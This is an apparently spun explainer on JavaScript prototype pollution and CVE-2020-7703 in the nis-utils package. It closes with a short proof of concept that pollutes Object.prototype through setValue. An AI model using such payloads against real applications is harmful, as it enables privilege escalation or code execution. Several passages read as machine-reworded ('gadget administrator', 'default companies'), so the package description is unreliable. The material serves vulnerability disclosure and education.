HTTP Prototype Pollution and CVE-2020-7703
Prototype Pollution
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as _proto_, constructor and prototype.
The vulnerability happens when parameters are injected and relied on by means of the susceptible website (web app), leading to unexpected behavior
Some examples of Prototype Pollution:
Denial of service (DoS)
DoS takes place when Object holds prevalent features that are implicitly referred to as for a variety of operations. The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is in all likelihood to reason a DoS.
For example: if an attacker pollutes Object.prototype.toString via defining it as an integer, if the codebase at any factor was once reliant on someobject.toString() it would fail.
Remote Code Execution
Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). Here, if the attacker pollutes Object.prototype.attribute, they are likely to be able to leverage this in order to execute code.
Property Injection
If a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.
CVE-2020-7703
Description:
All versions of package nis-utils are vulnerable to Prototype Pollution via the setValue function.
nis-util Package:
- A collection of powerful tools for manipulating Network Information Service (NIS) map files and are highly interrelated.
- In order to grant steady working surroundings for users, it is vital that the gadget administrator have tools which file inconsistencies between NIS maps in a well-timed manner
- The nis-utils bundle carries a number of tools that can be used to generate input to makedbm, in location of the awk scripts traditionally used. These tools are a ways greater exacting, and operate a wide variety of input validations, in addition to the vital reformatting.
- Every of these tools had a checking mode, which approves them to be validated towards different files, e.g. validating password documents against group archives to make positive that the default companies really exist.
Note:
- makedbm command makes a NIS map. It takes the input file and converts it to a ypserv database file.
- Awk is used as a data extraction and reporting tool. Also, a general-purpose scripting language designed for advanced text processing
Proof of Concept
const nisUtils = require(‘nis-utils’);
nisUtils.object.setValue({}, ‘__proto__.polluted’, true);
console.log(polluted);